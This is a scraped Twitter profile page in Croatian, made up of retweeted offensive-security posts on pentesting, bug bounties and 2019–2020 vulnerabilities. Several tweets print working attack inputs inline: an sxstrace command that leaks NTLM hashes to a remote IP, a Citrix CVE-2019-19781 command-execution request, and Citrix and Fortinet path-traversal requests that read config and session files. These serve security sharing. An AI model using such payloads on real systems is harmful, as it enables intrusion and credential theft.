Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @i_r_eip
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @i_r_eip
-
whoaim proslijedio/la je Tweet
How to hack yourself admin rights on any Autopilot installed Windows 10 - aka The Return of the Shift+F10!
#suomalaismies#4sysopshttps://4sysops.com/archives/hacking-admin-rights-on-an-autopilot-installed-windows-device-return-of-the-shift-f10/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
Oh yes, only god and users of http://ysoserial.net will know what I have done soon
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
SNMP Config File Injection to Shell
#infosec#pentest#redteamhttps://digi.ninja/blog/snmp_to_shell.php …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
A new way to exfiltrate
#NTLM hash by forcing#SMB auth ? Check this#Microsoft#lolbin: sxstrace parse -logfile:\\192.168.XX.XX\lol.etl -outfile:a.txt || sxstrace trace -logfile:\\192.168.xx.xx\a cc@OddvarmoeHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
Grouper2 : Find vulnerabilities in AD Group Policy : https://github.com/l0ss/Grouper2 cc
@mikelosspic.twitter.com/gCxVojplGa
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
SSRF https://ngailong.wordpress.com/2019/12/19/google-vrp-ssrf-in-google-cloud-platform-stackdriver … https://link.medium.com/Xbz6t9O2r3 https://link.medium.com/YHLYBsQ2r3 https://link.medium.com/IuBvi3Q2r3 https://link.medium.com/0RczPuR2r3 https://link.medium.com/CRffZUR2r3 https://link.medium.com/h4I5fpS2r3 https://link.medium.com/h3f0yHLEh3 https://link.medium.com/NOYWViSSg3
#bugbounty ,#bugbountytipsHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
I'm excited to share my post about discovering & exploiting multiple critical vulnerabilities in Cisco's DCNM. Busting Cisco's Beans :: Hardcoding Your Way to Hell https://srcincite.io/blog/2020/01/14/busting-ciscos-beans-hardcoding-your-way-to-hell.html … PoC exploit code: https://srcincite.io/pocs/cve-2019-15975.py.txt … https://srcincite.io/pocs/cve-2019-15976.py.txt … https://srcincite.io/pocs/cve-2019-15977.py.txt …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
The captcha and the 'Contact Us' button are perfect

#digitalexperiencepic.twitter.com/rlF57ICMjPPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
Support added to crack Citrix NetScaler (SHA512) hashes with hashcat 6.0.0: https://github.com/hashcat/hashcat/commit/53105abeb47a6c325dee6714b1503cd68bd0c9c8 …pic.twitter.com/Qr9nc2Avy4
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
Let’s Reverse Engineer Discord : https://medium.com/tenable-techblog/lets-reverse-engineer-discord-1976773f4626 … cc
@pneumagennao ||@CE2Wellspic.twitter.com/1QTzoSNzjN
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
Update CVE-2019-19781 You can exploit the vulnerability without the file http://newbm.pl and only use the file http://rmbm.pl ! You can inject your payload inside the name of the XML file and fire the command execution !

#shitrix#citrixpic.twitter.com/g2P1GAJo1R
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
For team blue: Turns out CVE-2019-19781 doesn't need a traversal, beware. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: <target> NSC_USER: ../../../netscaler/portal/templates/si NSC_NONCE: 5 Content-Length: 53 url=a&title=[%+http://template.new ({'BLOCK'='print+`id`'})%]
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
Just published a new blogpost with more details about the Citrix ADC Remote Command Execution.https://twitter.com/MDSecLabs/status/1215611640885972992 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
whoaim proslijedio/la je Tweet
CVE-2019-19781 Citrix path traversal base on vpns folder Example: GET /vpn/../vpns/services.html GET /vpn/../vpns/cfg/smb.conf patch >> HTTP/1.1 403 Forbidden no patch >> HTTP/1.1 200 OK [global] encrypt passwords = yes name resolve order = lmhosts wins host bcastpic.twitter.com/a6ehfTRIaJ
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
This little technique can force your blind
#XXE to output anything you want! https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/ …pic.twitter.com/JDC31VIJoC
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
So I finally decided to write about a cool (old) story with JBoss https://medium.com/@r0t1v/pwning-jboss-seam-2-like-a-boss-da5a43da6998 … /cc
@henshinpt@morissonHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
Who else is still scanning BB programs for this? They are still out there! Free

Happy holidays!
/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websessionHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
Criminals don’t give a fuck if you’re ISO 27001 compliant
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
whoaim proslijedio/la je Tweet
#ProTip When doing content discovery with@Burp_Suite Intruder, don't only rely on responses size or status code. A quick Grep Extract on "<title>(.*?)</title>" may go a long way...Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.